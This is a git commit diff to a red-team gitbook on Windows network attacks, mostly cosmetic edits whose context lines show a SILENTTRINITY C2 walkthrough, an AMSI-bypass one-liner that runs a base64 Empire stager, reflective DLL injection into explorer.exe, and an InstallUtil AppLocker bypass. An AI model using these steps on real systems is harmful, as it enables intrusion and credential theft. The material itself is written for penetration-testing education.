Added the Carbanak cybergroup financial raids to the war stories section

README.md

@@ -1,4 +1,4 @@
-# Darth Sidious
+# Hacking Windows Networks
 
 ![](https://www.designerd.com.br/wp-content/uploads/2014/07/8.png)
 

SUMMARY.md

@@ -1,6 +1,6 @@
 # Table of contents
 
-* [Darth Sidious](README.md)
+* [Hacking Windows Networks](README.md)
 
 ## GETTING STARTED
 
@@ -55,6 +55,7 @@
   * [lkylabs v1](other/writeups/lkylabs-v1.md)
 * [War stories](other/war-stories/README.md)
   * [Domain admin in 30 minutes](other/war-stories/domain-admin-in-30-minutes.md)
+  * [Anatomy of a Bank Hack](other/war-stories/anatomy-of-a-bank-hack.md)
 
 ## Credential access
 

building-a-lab/cuckoo-malware-analysis-lab.md

@@ -4,7 +4,7 @@
 
 I was inspired by this [great article](https://rastamouse.me/2017/05/playing-with-cuckoo/) by Rastamouse and decided to build an identical lab. It may seem slightly out of scope for this book, but you have to consider that if you develop your own payloads and tools you must test them before you put them into a production environment.
 
- I got it set up with some minor issues that I worked it. So in this guide I try to address some of the things that didn't work perfectly when setting this up to make it as smooth as possible. The result is approximately the same as rasta's lab so you can refer to his figures if you need to visualize this.
+I got it set up with some minor issues that I worked it. So in this guide I try to address some of the things that didn't work perfectly when setting this up to make it as smooth as possible. The result is approximately the same as rasta's lab so you can refer to his figures if you need to visualize this.
 
 Ping me on Twitter [@chryzsh](https://twitter.com/chryzsh) if something's not working. I will update the guide.
 

command-and-control/silenttrinity.md

@@ -6,7 +6,7 @@ description: Using Kali as a C2 Server
 
 SILENTTRINITY is a tool made by [byt3bl33d3r](https://twitter.com/byt3bl33d3r) which uses Ironpython for awesome C2 and post exploitation. I'll refer to it as ST in this article.
 
-{% embed url="https://github.com/byt3bl33d3r/SILENTTRINITY" %}
+{% embed url="https://github.com/byt3bl33d3r/SILENTTRINITY" caption="" %}
 
 ## Installation
 
@@ -34,7 +34,7 @@ python3.7 st.py
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![Ready to go](../.gitbook/assets/image%20%2831%29.png)
+![Ready to go](../.gitbook/assets/image-31.png)
 
 ## Listening
 
@@ -53,7 +53,7 @@ start
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%2856%29.png)
+![](../.gitbook/assets/image-56.png)
 
 ## Staging
 
@@ -70,9 +70,9 @@ generate http
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%2842%29.png)
+![](../.gitbook/assets/image-42.png)
 
-![](../.gitbook/assets/image%20%2811%29.png)
+![](../.gitbook/assets/image-11.png)
 
 ## Execution
 
@@ -93,7 +93,7 @@ smbserver.py SMB /opt/SMB -username hacker -password hacker -smb2support -ip 10.
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%281%29.png)
+![](../.gitbook/assets/image-1.png)
 
 ### Triggering the payload
 
@@ -108,11 +108,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\10.0.8.6\SMB\msbui
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%2834%29.png)
+![](../.gitbook/assets/image-34.png)
 
 ### Caching credentials
 
-So why did we specify credentials then? On Windows 10 you can't use SMB unauthenticated by default. And as far as I know there isn't a way to give msbuild credentials directly. So I fiddled around and find a little trick to cache some credentials for my SMB server on the host.  As you see I use hacker/hacker for authentication. Very secure of course. On the target, trigger an authenticated `net use` command. This should try to access the SMB share with the specified credentials, and therefore cache them locally on the target. From an opsec perspective this isn’t ideal, so if you have suggestions please reach out.
+So why did we specify credentials then? On Windows 10 you can't use SMB unauthenticated by default. And as far as I know there isn't a way to give msbuild credentials directly. So I fiddled around and find a little trick to cache some credentials for my SMB server on the host. As you see I use hacker/hacker for authentication. Very secure of course. On the target, trigger an authenticated `net use` command. This should try to access the SMB share with the specified credentials, and therefore cache them locally on the target. From an opsec perspective this isn’t ideal, so if you have suggestions please reach out.
 
 {% code-tabs %}
 {% code-tabs-item title="victim@target" %}
@@ -122,15 +122,15 @@ net use \\10.0.8.6\smb /user:hacker hacker
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%2832%29.png)
+![](../.gitbook/assets/image-32.png)
 
 We see that we get a successful authentication and a NetNTLMv2 hash instantly. So now with cached credentials on the target, let's try to trigger our payload again.
 
-![](../.gitbook/assets/image%20%2812%29.png)
+![](../.gitbook/assets/image-12.png)
 
 Voila! Something started happening. Let's check back in ST.
 
-![](../.gitbook/assets/image%20%2836%29.png)
+![](../.gitbook/assets/image-36.png)
 
 Like sweet magic, we got a session. The authentication reuses the credentials that were cached.
 
@@ -147,13 +147,13 @@ list
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%2841%29.png)
+![](../.gitbook/assets/image-41.png)
 
 So let's explore some of the post exploitation modules that ST has to offer. As you can see, ST has a lot of built in modules already and by the looks of it, there are more to come.
 
-![](../.gitbook/assets/image%20%282%29.png)
+![](../.gitbook/assets/image-2.png)
 
-Let's select the `mimikatz`  module and run it towards our session. Word of notice here, you have to copy the GUID from the session list so you have it ready. You can alternatively use `run all` to run it on all session, if you have several sessions.
+Let's select the `mimikatz` module and run it towards our session. Word of notice here, you have to copy the GUID from the session list so you have it ready. You can alternatively use `run all` to run it on all session, if you have several sessions.
 
 {% code-tabs %}
 {% code-tabs-item title="hacker@st" %}
@@ -167,7 +167,7 @@ run GUID
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%2827%29.png)
+![](../.gitbook/assets/image-27.png)
 
 Running the shell module for good measure
 
@@ -183,9 +183,9 @@ run GUID
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%2847%29.png)
+![](../.gitbook/assets/image-47.png)
 
-Trying the execute-assembly module with [Watson](https://github.com/rasta-mouse/Watson).  Actually noticed at this point that ST starts autocompleting the GUID for the session I'm working on. Right arrow on the keyboard to complete it.
+Trying the execute-assembly module with [Watson](https://github.com/rasta-mouse/Watson). Actually noticed at this point that ST starts autocompleting the GUID for the session I'm working on. Right arrow on the keyboard to complete it.
 
 {% code-tabs %}
 {% code-tabs-item title="hacker@st" %}
@@ -199,9 +199,9 @@ run GUID
 {% endcode-tabs-item %}
 {% endcode-tabs %}
 
-![](../.gitbook/assets/image%20%283%29.png)
+![](../.gitbook/assets/image-3.png)
 
-![](../.gitbook/assets/image%20%287%29.png)
+![](../.gitbook/assets/image-7.png)
 
 Didn't find anything on my patched Windows 10 1803 VM, but that's ok.
 

defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode.md

@@ -23,59 +23,59 @@ set Listener http
 generate
 ```
 
-![](../.gitbook/assets/image%20%2821%29.png)
+![](../.gitbook/assets/image-21.png)
 
-![](../.gitbook/assets/image%20%2820%29.png)
+![](../.gitbook/assets/image-20.png)
 
 ### ReflectivePick with Visual Studio
 
 We are now going to write the stager we generated into the ReflectivePick project.
 
 Open the [PowerPick project ](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick/ReflectivePick)in VS. It may be necessary to set the target to x64. Project -> ReflectivePick properties -> Configuration Manager -> Platform
 
-![](../.gitbook/assets/image%20%2823%29.png)
+![](../.gitbook/assets/image-23.png)
 
 Add the base64 from the stager where appropriate.
 
-![](../.gitbook/assets/image%20%2826%29.png)
+![](../.gitbook/assets/image-26.png)
 
 `wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.sAmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\Windows\Tasks\out.txt;IEX $decoded"; //Output debug`
 
 This includes an output write for demonstration purposes. You can remove it if you desire.
 
 Compile the dll to `ReflectivePick_x64.dll`
 
-![](../.gitbook/assets/image%20%2839%29.png)
+![](../.gitbook/assets/image-39.png)
 
 ### Execution
 
 We can now try to run the dll with `rundll32.exe .\ReflectivePick_x64.dll,Void` but as you will soon discover, AMSI picks up the Empire stager during runtime.
 
-![](../.gitbook/assets/image%20%2816%29.png)
+![](../.gitbook/assets/image-16.png)
 
 Disable AMSI however, and you get an agent back.
 
-![](../.gitbook/assets/image%20%2857%29.png)
+![](../.gitbook/assets/image-57.png)
 
 You can also view the base64-decoded stager payload in `c:\windows\tasks\out.txt`
 
-![](../.gitbook/assets/image%20%289%29.png)
+![](../.gitbook/assets/image-9.png)
 
 We can't rely on manually disabling AMSI, so we are going to run it through a few more hoops.
 
 ### Load the DLL into another process
 
 To avoid creating a new process and loading the non-whitelisted DLL we are going to reflectively inject it into a process using [Invoke-ReflectiveInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1).
 
- Use the following commands in PS to encode the DLL to base64 and pipe the results to a file. Don't worry if the commands take a few seconds to run. I have also noticed that Powershell adds a newline at the bottom of the file when Base64-encoding like this so manually remove that if it is present.
+Use the following commands in PS to encode the DLL to base64 and pipe the results to a file. Don't worry if the commands take a few seconds to run. I have also noticed that Powershell adds a newline at the bottom of the file when Base64-encoding like this so manually remove that if it is present.
 
 ```text
 $Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte
 $Encoded = [System.Convert]::ToBase64String($Content)
 $Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\dll.txt"
 ```
 
-![](../.gitbook/assets/image%20%2814%29.png)
+![](../.gitbook/assets/image-14.png)
 
 Now you want to download [Invoke-ReflectivePEInjection](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) to the working directory and open it in a text editor. At the bottom of the file, add the following lines, where we copypaste the contents of `dll.txt` to the `$dllData` object. This will ensure the dll is reflectively injected into the `explorer.exe` process during runtime.
 
@@ -86,7 +86,7 @@ $Bytes = [System.Convert]::FromBase64String($dllData)
 Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId
 ```
 
-![](../.gitbook/assets/image%20%2851%29.png)
+![](../.gitbook/assets/image-51.png)
 
 ### Compile to an EXE using VS
 
@@ -98,23 +98,23 @@ $Encoded = [System.Convert]::ToBase64String($Content)
 $Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\pe.txt"
 ```
 
-![](../.gitbook/assets/image%20%2849%29.png)
+![](../.gitbook/assets/image-49.png)
 
 Open the [Bypass project](https://github.com/MortenSchenk/Babuska-Dolls/tree/master/Bypass) in VS and copypaste the base64 into the encoded variable. Compile to `Bypass.exe` with VS.
 
-![](../.gitbook/assets/image%20%2833%29.png)
+![](../.gitbook/assets/image-33.png)
 
 ### Final execution
 
 Use `installutil.exe` or similar [LOLbBns ](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LOLBins.md)to execute `Bypass.exe`. If Applocker is present, execute it from a whitelisted directory such as `C:\Windows\Tasks`
 
 ```text
-C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe 
+C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe
 ```
 
-![](../.gitbook/assets/image%20%2813%29.png)
+![](../.gitbook/assets/image-13.png)
 
-![](../.gitbook/assets/image%20%2819%29.png)
+![](../.gitbook/assets/image-19.png)
 
 Thrilling! We bypassed both Applocker and Powershell constrained language mode and got an Empire agent back.
 

enumeration/azure-enumeration.md

@@ -29,8 +29,6 @@ Azure is by default open to every user in the organization. That means clients w
 
 A little code block with some common procedures for enumerating Azure AD.
 
-
-
 ```text
 ### Azure AD enumeration
 
@@ -71,7 +69,7 @@ az ad user list --output=json --query='[].{Created:createdDateTime,UPN:userPrinc
 #PS script to get array of users / roles
 $roleUsers = @() 
 $roles=Get-AzureADDirectoryRole
- 
+
 ForEach($role in $roles) {
   $users=Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId
   ForEach($user in $users) {

enumeration/bloodhound.md

@@ -12,11 +12,11 @@ One of the glorious design features of AD is that everyone in the domain needs t
 
 Now we can use this brilliant feature to collect a ton of information and create a cool GUI map of the entire AD which can be queried using BloodHound. There are two software requirements, you need `BloodHound` and a database to store the data in. The recommended choice is `neo4j`, see below for further instructions.
 
-![Example picture](../.gitbook/assets/image%20%2845%29.png)
+![Example picture](../.gitbook/assets/image-45.png)
 
 ## Installing neo4j
 
-#### Linux
+### Linux
 
 * [Install neo4j](https://neo4j.com/developer/kb/how-do-i-enable-remote-https-access-with-neo4j-30x/) [Community Edition](https://neo4j.com/download/community-edition/) manually from their [website](https://neo4j.com/download/?ref=hro) , not through apt.
 * [http://neo4j.com/download/other-releases/\#releases](http://neo4j.com/download/other-releases/#releases)
@@ -25,17 +25,17 @@ Now we can use this brilliant feature to collect a ton of information and create
 * Navigate to `localhost:7474` in your browser
 * Log in with username and password `neo4j` 
 * Set a new password for the neo4j account
-* Open the file `neo4j.conf`  from the neo4j installation directory and set the following parameters to make any host be able to access the database.
+* Open the file `neo4j.conf` from the neo4j installation directory and set the following parameters to make any host be able to access the database.
 
   ```text
   dbms.connector.http.enabled=true
   dbms.connector.http.listen_address=0.0.0.0:7474
   ```
 
-* Restart neo4j with  `/opt/neo4j-community-3.1.1/bin/neo4j restart`
+* Restart neo4j with `/opt/neo4j-community-3.1.1/bin/neo4j restart`
 * Access neo4j in the browser at `http://0.0.0.0:7474/browser/`
 
-#### Windows
+### Windows
 
 Neo4j can be started with powershell on windows.
 
@@ -45,7 +45,7 @@ Neo4j can be started with powershell on windows.
 * `Invoke-Neo4j Console`
 * Likewise to Linux, log in to `localhost:7474` from your browser and change the password.
 
-#### MacOS
+### MacOS
 
 Similar procedure as linux. Neo4j does not support Java 9, so Java SDK must be version 8 and not 9. Install java 8 with cask in Homebrew:
 
@@ -65,17 +65,17 @@ From Bloodhound [version 1.5](https://github.com/BloodHoundAD/BloodHound/release
 
 Bloodhound is now in [version 2.0](https://github.com/BloodHoundAD/BloodHound/releases/tag/2.0.3.1), so make sure to grab the latest version of the ingestor. For Windows you can use the [SharpHound exe](https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe).
 
-#### Powershell ingestion
+### Powershell ingestion
 
 What I recommend doing if you have internal network access is to run Bloodhound using `runas /netonly` from your own machine and not from a host you are not in the control of. This way you're not cluttering a domain joined machine with files, you will not trigger antivirus and you don't have to exfiltrate the data either, so its generally less noisy.
 
 `runas /netonly /FQDN\user\<username> powershell`
 
 **Example with the domain** `testlab.local` **and a username** `testuser`
 
-`runas /netonly /testlab.local\user\testuser powershell` 
+`runas /netonly /testlab.local\user\testuser powershell`
 
-Type in the password of testuser when prompted. This should spawn a new Powershell window. This window will use the local DNS settings to find the nearest domain controller and perform the various LDAP queries Bloodhound performs. First, from a powershell shell with execution policy set to bypass, import the powershell module `Import-module SharpHound.ps1` 
+Type in the password of testuser when prompted. This should spawn a new Powershell window. This window will use the local DNS settings to find the nearest domain controller and perform the various LDAP queries Bloodhound performs. First, from a powershell shell with execution policy set to bypass, import the powershell module `Import-module SharpHound.ps1`
 
 Then, start collecting data. This command specifies to collect all kinds of information, compress it into a ZIP and remove stray CSV files generated during ingestion.
 
@@ -87,9 +87,9 @@ You should immediately see data being populated into the database and the interf
 
 You can now play with BloodHound to create really some really cool maps. You can also perform queries to show the shortest path to DA, etc. See the default queries and SpectreOps blog posts for inspiration.
 
-![Example picture](../.gitbook/assets/image%20%2815%29.png)
+![Example picture](../.gitbook/assets/image-15.png)
 
-#### Python ingestion from Kali
+### Python ingestion from Kali
 
 If you have a Kali box on the local network you can use the [ Bloodhound.py ingestor](https://github.com/fox-it/BloodHound.py).
 

getting-started/external-network-access-to-domain-admin.md

@@ -26,7 +26,7 @@ The general approach to going from external network access to domain admin consi
 * MSSQL \(1433\)
 * RDS \(3389\)
 * RDWEB \(3389, navigate to [http://ip/rdweb](http://ip/rdweb)\)
-* OWA \(80, navigate to subdomain email.domain.com or http://ip/owa\)
+* OWA \(80, navigate to subdomain email.domain.com or [http://ip/owa\](http://ip/owa\)\)
 
 **Tools**
 

initial-access/initial-access-through-exchange.md

@@ -8,7 +8,7 @@
 
 ## Introduction
 
-Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim isto  abuse the client-side Outlook features and gain a shell remotely.
+Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim isto abuse the client-side Outlook features and gain a shell remotely.
 
 Ruler attempts to interact with Exchange and uses the Autodiscover service \(just like in your organization\) to discover the relevant information needed to proceed.